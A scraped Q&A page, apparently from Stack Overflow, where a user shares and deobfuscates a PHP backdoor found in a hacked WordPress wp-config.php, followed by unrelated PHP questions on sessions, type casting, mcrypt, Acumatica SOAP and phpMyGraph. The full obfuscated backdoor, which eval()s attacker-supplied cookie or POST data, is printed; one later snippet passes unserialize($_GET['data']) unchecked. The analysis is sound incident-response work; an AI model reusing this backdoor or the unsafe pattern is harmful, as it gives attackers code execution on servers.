Wordpress Hacked, understanding obfuscated line on wp-config.php - php

One line of code was added to my friend's WordPress wp-config.php:
$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa[
'cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge
142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);#$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa
['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function 
i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=#$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>#$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo#$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142ef
a['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}
What does it mean?
I've tried changing eval to print, but nothing is shown.
https://eval.in/584427

By using a var_dump after the first statement with $_COOKIE I could see that the structure of the first array appears to contain several function names which are supposedly called later:
var_dump($ge142efa);
array(14) {
["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18 H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^#G,n]\;MXv?5){}Rcowfjb>A-"
["hfa2b"]=>
string(3) "chr"
["he58"]=>
string(3) "ord"
["ge19947"]=>
string(6) "strlen"
["xa2a5ede"]=>
string(7) "ini_set"
["k5051"]=>
string(9) "serialize"
["z2503c"]=>
string(10) "phpversion"
["i50830251"]=>
string(11) "unserialize"
["kf8736"]=>
string(13) "base64_decode"
["vc05"]=>
string(14) "set_time_limit"
["u491"]=>
string(4) "i461"
["v2298682"]=>
string(4) "g2bc"
["re5bf"]=>
string(6) "$_POST"
["j975"]=>
string(8) "$_COOKIE"
}
I have replaced the $_POST and $_COOKIE contents with strings as placeholders because my test environment is php -f inside a container.
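The part between this array and the first function declaration boils down to the following. Note that the `#` characters in these listings almost certainly stand for PHP's `@` error-suppression operator: the byte `\x40` (`@`) of the lookup string is printed as `#` in the dump above (`$^#G`), and a real `#` would comment out the rest of the one-line payload. So these calls are executed with their errors suppressed; they are not commented out.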
#ini_set('error_log', NULL); // #$ge142efa['xa2a5ede']('error_log', NULL);
#ini_set('log_errors', 0); // #$ge142efa['xa2a5ede']('log_errors', 0);
#ini_set('max_execution_time', 0); // #$ge142efa['xa2a5ede']('max_execution_time', 0);
#set_time_limit(0); // #$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';
The first function reads thus:
/**
 * XOR the bytes of $tf027f with the bytes of $p7ec, repeating $p7ec as often
 * as needed, and return the resulting string (repeating-key XOR).
 *
 * "strlen", "chr" and "ord" are called through string callables; that is what
 * the array lookups of the obfuscated original resolve to.
 *
 * @param string $tf027f Data to transform.
 * @param string $p7ec   Key; an empty key never advances $i, so the outer loop would not end.
 * @return string        The XOR-ed bytes, same length as $tf027f.
 */
function g2bc($tf027f, $p7ec){
global $ge142efa;
$de211af = "";
// The outer loop has no increment of its own: $i is advanced by the inner loop only.
for($i = 0; $i < "strlen"($tf027f);){
// $j walks the key from its start on every pass while $i keeps moving through the data.
for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
$de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
}
}
return $de211af;
}
It appears to xor two strings and return the result.
The function below that, i461, uses it twice:
function i461($tf027f, $p7ec){
global $ge142efa;
global $m001c8475;
return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}
The code below these two functions
can be beautified to this:
foreach($_COOKIE as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
if(!$tf027f){
foreach($_POST as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
}
$tf027f =# "unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
if($tf027f["a"] == "i"){
$z225cd560 = Array("pv" => #"phpversion"(), "sv" => "1.0-1",);
echo#"serialize"($z225cd560);
}elseif($tf027f["a"] == "e"){
eval($tf027f["d"]);
}
exit();
}
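The critical part here is the eval. From my point of view this looks like code that executes something given by the right combination of $_COOKIE and/or $_POST: basically a backdoor that waits for the right request and then executes the PHP code specified by it. Because that gives whoever planted it arbitrary code execution on the server, deleting this one line is not enough. Treat the whole site as compromised: look for other modified or added files, restore from a known-clean copy, and change the database password and the keys and salts stored in wp-config.php.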

I'm dealing with the same issue myself. Your friend has to make some changes. Maybe someone has traced the IP address and is making changes in the database, which then affects your front end and your code as well.
- If you have a backup of the database, then change the database to the backup.
- Install a security plugin such as All In One WP Security & Firewall.
(If the IP is traced again, the plugin may help in the future.)
Some other changes:
Search the image paths in the database; they may contain malware.
Remove unused scripts from the code.
Change the admin panel login credentials.
Change the cPanel credentials.

Related

Global/SESSION PHP Array/Variable without content

I have a huge problem which I can't seem to fix. I got 2 files. insertDB.php(for writing content into my database) & mail.php(for sending me a mail if something got written into databse). Because I don't want the mail stuff in the same file as the SQL-Statements, I created the mail.php file.
Now I want to pass Variables or an Array from insertDB to mail. It works in every other file I'm using but it's not working here.
<?php
//insertDB.php
Session_Start();
include 'dbconnect.php';
$login = $_SESSION['login'];
$num = $_mysqli->real_escape_string($_POST['num']);
$date = $_mysqli->real_escape_string($_POST['date']);
$user = $_mysqli->real_escape_string($_POST['user']);
$program = $_mysqli->real_escape_string($_POST['program']);
$name = $_mysqli->real_escape_string($_POST['name']);
$path = $_mysqli->real_escape_string($_POST['path']);
$mailData = [$num, $date, $user, $program, $name, $path];
$_SESSION['mailData'] = $mailData;
// var_dump($_SESSION['mailData']); <- outputs array WITH content
$insert = "INSERT INTO Zeichnungen (Num, Date, User, Program, Name, Path, Info, Leer)
VALUES ('$num', '$date', '$user', '$program', '$name', '$path', '', '$login')";
if ($_result = $_mysqli->query($insert)) {
header('Location: mail.php');
}
?>
<?php
//mail.php
Session_Start();
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
use PHPMailer\PHPMailer\SMTP;
include '/opt/composer/vendor/autoload.php';
include 'insertDB.php';
$login = $_SESSION['login'];
var_dump($_SESSION['mailData']);
?>
/* Output I see in Browser from mail.php -> var_dump($_SESSION['mailData']); : */
array(6) { [0]=> string(0) "" [1]=> string(0) "" [2]=> string(0) "" [3]=> string(0) "" [4]=> string(0) "" [5]=> string(0) "" }
What is the problem? Why does it have no content but the 6 keys?
Any help appreciated.
Looking at the code, there is nothing obvious to me that can cause var_dump() to print 6 empty strings. Running the provided code does not reproduce your problem (despite unnecessarily calling start_session() again, but that has no effect other than a warning).
This is difficult to debug this way. Don't use the session for this if this data does not survive through multiple requests. If you don't want to use classes, at least pass the data to functions with one responsibility. Using the session to store these variables is not a good practice. It is unnecessary global state and will eventually make this code even more difficult to follow and debug.
You have several examples in http://php.net/manual/en/functions.user-defined.php. Define the functions in one file and note that you must include that file before being able to use them. Do not mix concerns, ie: your mail function should not set HTTP headers, and your database function should not access the $_SESSION or $_POST variables.
For example, in insertIntoDb.php (less fields for clarity) and using functions:
<?php
// ... (necessary mysqli includes, etc.)
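/**
 * Insert one form submission into SomeTable.
 *
 * @param array $formData Values for the row; the keys 'num', 'date' and 'login' are read.
 * @return void Ends the script with "Database error" when the statement cannot be prepared or executed.
 */
function insertIntoDB(array $formData) {
    // A function body does not see file-scope variables, so the connection
    // object has to be imported explicitly.
    // NOTE(review): assumes the DB include defines a mysqli connection named $_mysqli; confirm.
    global $_mysqli;

    // Bound parameters keep every value out of the SQL text. The previous
    // version escaped 'num' and 'date' but interpolated 'login' unescaped.
    $stmt = $_mysqli->prepare(
        'INSERT INTO SomeTable (Num, Date, Login) VALUES (?, ?, ?)'
    );
    if (!$stmt) {
        die("Database error");
    }

    // bind_param() takes its arguments by reference, hence the locals.
    $num = $formData['num'];
    $date = $formData['date'];
    $login = $formData['login'];
    $stmt->bind_param('sss', $num, $date, $login);

    // it's better not to have other side effects here:
    // if everything goes right, we just continue
    if (!$stmt->execute()) {
        die("Database error");
    }
}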
In your mail.php file:
<?php
include 'insertIntoDb.php';
include 'sendEmail.php';
// we read the POST and other values here
// constructing an associative array is an
// option if not using objects.
$formData = [
'num' => $_POST['num'],
'date' => $_POST['date'],
'login' => $_SESSION['login'],
];
// using the functions
insertIntoDb($formData);
sendEmail($formData); // defined in sendEmail.php, not in example.
// this point is reached when everything works,
// no need to control flow...
header('Location: success.php'); // perhaps "thanks" message.
as many have said, the code is clean and should work. The other possible culprit is the following line
header('Location: mail.php');
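The Location header sent by header() makes the browser issue a new GET request for mail.php, so the POST data is gone by the time mail.php runs. Because mail.php includes insertDB.php, that script then runs again with an empty $_POST and overwrites $_SESSION['mailData'] with six empty strings.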
Instead make mail.php a function then include mail.php in insertDB.php
NB: try to adopt OOP coding particulary when dealing with PHP

How to convert String(16) to Int(1) in php

For instance
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}"; //this syntax works
var_dump($user_post_id); // gives String(16) '1'
$user_post_int_id = (int)$user_post_id; // change from string to int
var_dump($user_post_int_id); // gives int(1) 0, I don't know why isn't type conversion working!
echo $user_post_id; // echoes out 1
echo $user_post_int_id; //echoes out the 0
So the main problem I think is of type conversion, as I tried one more thing where String(1) is converting to int(1) with no problem but with string(16) everything blows apart and results to 0.
i got 3 suggestion 4u (on my server all works fine)
as a original with my comments:
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}"; //this syntax works
var_dump($user_post_id); // gives String(16) '1'
$user_post_int_id = (int)$user_post_id; // change to int
var_dump($user_post_int_id);
// gives int(1) 1, is not test your php/server conf!
echo $user_post_id; // echoes out 1
echo $user_post_int_id; //echoes out 1
then i advise you to try with your code, run on your server with changes:
replace $user_post_id = "{{list.user.id}}";
to $user_post_id = (int){{list.user.id}};
//hopes your php wudn't show an error
replace $user_post_int_id = (int)$user_post_id;
to $user_post_int_id = floor((int)$user_post_id);
or $user_post_int_id = ceil((int)$user_post_id);
replace $user_post_id = "{{list.user.id}}";
to $user_post_id = (int)({{list.user.id}}) + 1 ;
or plus zero, these hack sometimes works for me !
p.s. (int) can do a trick with you, php can thout that you uses hex bin or smth else. retest it twice !
php.net/manual/en/language.types.integer.php
php.net/manual/en/language.types.type-juggling.php
You cannot use Angular expression inside a server side statements, as Angular statement runs on client side after running all server logic.
In your code:
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}" //list.user.id is a JS variable, you cannot use it in PHP.
$user_post_int_id = (int)$user_post_id; // something wrong here, you do not need this step, normally if you retrieved the code from server side.
{{ $user_post_int_id }} //this should not work
But still this blade function fails
@if(Auth::user()->id == $user_post_int_id)
do something //returns false, makes alot of sense, as again you are trying to get variables from JS and passing them to PHP scripts. This will never work.
@endif

PHP Mcrypt_decrypt decrypt only parts of the original string

I have a weird problem regarding passing an encrypted string through url. I'm using base64 encryptions from mcrypt() for encryptHTML() and decryptHTML().
I have this piece of code to encrypt:
$link_string = http_build_query(array('index_number'=>30843854, 'extra_attendence_id'=>27982423, 'target_temporary_id'=>378492085, 'date'=>'2016-05-06', 'action'=>'OUT', 'target_id'=>390234), '', '&');
$link_string = encryptHTML($link_string);
then I passed it through this url:
'localhost/website/controller/action/'.$link_string
then I decrypted it with this piece of code:
$id = $this->request->param('id');
$id = decryptHTML($id);
parse_str($id, $arr_id2);
var_dump($arr_id2);
I will get these in return, as expected:
array(6) { ["index_number"]=> string(8) "30843854" ["extra_attendence_id"]=> string(8) "27982423" ["target_temporary_id"]=> string(9) "378492085" ["date"]=> string(10) "2016-05-06" ["action"]=> string(3) "OUT" ["target_id"]=> string(6) "390234" }
The next case is when I still want the encrypted link but I need to attach some other value from DOM element in the page, so I tried to
'localhost/website/controller/action/encrypt='.$link_string.'&DOMvalue=10000'
then I modified the decryption with this piece of code:
$id = $this->request->param('id');
parse_str($id, $arr_id2);
$the_DOMValue = $arr_id2['DOMvalue'];
$id = decryptHTML($arr_id2['crypted']);
parse_str($id, $arr_id);
var_dump($the_DOMValue); echo "<br>";
var_dump($arr_id);
But then, I get these in return, to my surprise:
string(5) "10000"
array(3) { ["index_number"]=> string(13) "58_2016-04-26" ["extra_attendence_id"]=> string(1) "0" ["target_t"]=> string(0) "" }
My original string was cut short! Note that the DOMvalue is fine.
Then, I checked that right before both decryption, if the given encrypted string is different:
on first case of decryptHTML:
$id = $this->request->param('id');
var_dump($id);
$id = decryptHTML($id);
returns:
string(224) "zCQnh-rNP2R7h4UHyV5Dm5zp494DIIku5LWN51yYGMXBaHf0gJgEDw8UCuHRZxr-CkjkevHQ70kOPnSBQ9CJP6lZrFone-nDMDJhYlL8330wz+zud8-3tSWvdOLB7je5D-22aX4OrE3zlBYZZZtI-rMT73H0JGIRzZge2GzcZGLwS7Rj+GL5Ym-ET6JEHDShST4etgcQaEYXml-+BZ2+0BQKvubZEBOB"
on the second case of decryptHTML:
$id = $this->request->param('id');
parse_str($id, $arr_id2);
$the_DOMValue = $arr_id2['DOMvalue'];
var_dump($arr_id2['crypted']);
$id = decryptHTML($arr_id2['crypted']);
returns:
string(224) "zCQnh-rNP2R7h4UHyV5Dm5zp494DIIku5LWN51yYGMXBaHf0gJgEDw8UCuHRZxr-CkjkevHQ70kOPnSBQ9CJP6lZrFone-nDMDJhYlL8330wz zud8-3tSWvdOLB7je5D-22aX4OrE3zlBYZZZtI-rMT73H0JGIRzZge2GzcZGLwS7Rj GL5Ym-ET6JEHDShST4etgcQaEYXml- BZ2 0BQKvubZEBOB"
It looks exactly the same to me, but strangely it was decrypted differently. I of course used the same functions to decrypt both cases...
Anybody can shed me some light on this?
passing an encrypted string through url
Passing an encrypted string through a URL is a bad idea. Full stop.
I'm using base64 encryptions from mcrypt() for encryptHTML() and decryptHTML().
Without seeing what these functions do, this isn't helpful information, but mcrypt should be avoided. Use Libsodium (if you can; otherwise, use OpenSSL) instead.
My original string was cut short!
It probably treated the + as a space. Using urlencode() would fix one problem, but it wouldn't solve the vulnerability to chosen-ciphertext attacks that using mcrypt introduces into your application in the absence of a Message Authentication Code (MAC).

Getting a list of Contacts from Acumatica Web Services API using PHP

I'm trying to use the Acumatica Web Services API to get a list of Contacts (really I'm looking to get ANYTHING, but Contacts are what I'm playing with right now).
I'm successfully able to get a SoapClient connected, but not sure what exactly to do from there to pull a list of all Contacts.
Seeing how you didn't specify Acumatica version or Webservices I'm assuming you are trying to use the "Screen WebAPI" that was in 5.2 and earlier and not the new "Contract Based API" in 5.3
With that in mind, here is an example of how to make the connection and retrieve a list of all of the contacts.
The first step is to utilize the "acuwsdl2php" helper file to generate the needed screen helper classes for PHP.
In the case of contacts:
php acuwsdl2php.php {url of your site}/Soap/CR302000.asmx?WSDL CR302000
This will create the CR302000 subfolder with a Screen.php file that is the php equivalent of the schema for the screen.
Second, here is a sample class that retrieves contact information
<?php
require_once('AcumaticaGate.php');
$client = new AcumaticaGate('{user}', '{password}', 'CR302000','{site}/Soap/');
$Contact_summary = $client->Schema->GetSchemaResult->ContactSummary;
$Contact_detailsummary = $client->Schema->GetSchemaResult->DetailsSummary;
$every_Contact = $Contact_summary->ServiceCommands->EveryContactID;
$Contact = $Contact_summary->ContactID;
$Contact_fname = $Contact_detailsummary->FirstName;
$Contact_lname = $Contact_detailsummary->LastName;
$export_param = new Export();
$export_param->commands = array($every_Contact, $Contact, $Contact_fname, $Contact_lname);
$export_param->filters = array();
$export_param->breakOnError = false;
$export_param->includeHeaders = true;
$export_param->topCount = 0;
$export = $client->Client->Export($export_param);
print_r(var_dump($export));
The output here is something like this:
[177]=>
object(stdClass)#562 (1) {
["string"]=>
array(3) {
[0]=>
string(3) "358"
[1]=>
string(4) "Anna"
[2]=>
string(7) "Johnson"
}
}
[178]=>
object(stdClass)#563 (1) {
["string"]=>
array(3) {
[0]=>
string(3) "359"
[1]=>
string(4) "Yona"
[2]=>
string(5) "Jones"
}
}
The acuwsdl2php and AcumaticaGate files are helper files that Acumatica provided to partners. They might also be available on the client portal for download. A quick google for them though and I believe you can find them on a few public sites.
As a side note, these helper files were originally written for 4.x. You should look at the 5.x guides (assuming you have 5.x) for added information on logging off of a webapi when finished calling it.

PHPmyGraph: send an array with GET

I could not find any answer to my question.
I'm using PhPmyGraph ( http://phpmygraph.abisvmm.nl/ ) to display a graph of some data from my databases.
The problem is that I have to create my arrays in the file itself, and if I want 2 graphs on the page I need to create 2 different files.
Apparently the file is easier to use with a CMS but I'm not using one.
This is the file graph.php:
<?php
//Set content-type header for the graphs
header("Content-type: image/png");
//Include phpMyGraph5.0.php
include_once('../phpMyGraph5.0.php');
//Set config directives
$cfg['title'] = 'Example graph';
$cfg['width'] = 500;
$cfg['height'] = 250;
//Set data
$data = array(
'Jan' => 12,
'Nov' => 78,
'Dec' => 23
);
//Create phpMyGraph instance
$graph = new phpMyGraph();
//Parse
$graph->parseVerticalPolygonGraph($data, $cfg);
?>
I call it in my page index.php:
echo " < img src=\"graph.php\"> ";
Is there another way to do it? And send the data from index.php to graph.php?
Or maybe move the code graph.php into index.php ? The problem is for the image object, I don't really know how to do it!
UPDATE:
I have almost found a solution, my code is now:
in graph.php:
//Parse
$graph->parseVerticalPolygonGraph(unserialize($_GET['data']), $cfg);
index.php :
$select_daily = mysql_query("SELECT * FROM table");
while ($row_daily = mysql_fetch_assoc($select_daily) ){
$y = substr($row_daily['ymd'], 0, -4); // Year
$m = substr($row_daily['ymd'], 4, -2); // Month
$d = substr($row_daily['ymd'], -2); // Day
$key = $d."/".$m."/".$y;
$data_daily [$key] = $row_daily['members'];
}
foreach($data_daily as $key => $value) {
echo $key ,' : ', $value ,'<br/>';
}
echo "< img src=\"graph.php?data=".serialize($data_daily)."\">";
